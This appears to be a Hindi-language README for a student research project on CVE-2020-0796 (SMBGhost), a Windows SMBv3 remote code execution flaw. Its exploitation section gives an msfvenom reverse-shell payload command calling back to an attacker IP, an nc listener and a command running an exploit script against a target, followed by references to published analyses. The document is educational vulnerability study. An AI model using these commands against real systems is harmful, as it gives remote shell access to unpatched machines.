CVE-2020-0796
CVE-2020-0796 की व्याख्या और शुरुआती लोगों के लिए टर्म प्रोजेक्ट CENG325 हेतु भेद्यता पर शोध
कैसे एक्सप्लॉइट करें?
रिवर्स शेल के लिए पेलोड उत्पन्न करना:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
लिसनिंग पोर्ट:
nc -lvnp 5555
एक्सप्लॉइट कोड निष्पादन:
python3 exploit.py -ip TARGET_IP
PoC रिपॉजिटरीज़
संदर्भ
- CVE-2020-0796: “Wormable” रिमोट कोड निष्पादन भेद्यता.(2020, मार्च 13). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- “I’ll ask your body”: Direct Memory Access संरचनाओं का दुरुपयोग करने वाला SMBGhost प्री-ऑथ RCE. (2020, अप्रैल 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- Windows 10 SMB सर्वर में CVE-2020-0796 मेमोरी करप्शन भेद्यता| FortiGuard Labs. (2020, मार्च 12). Fortinet Blog.
https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2020, अप्रैल 2). CVE-2020–0796 Windows SMBv3 LPE एक्सप्लॉइट POC विश्लेषण. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/
प्रोजेक्ट सदस्य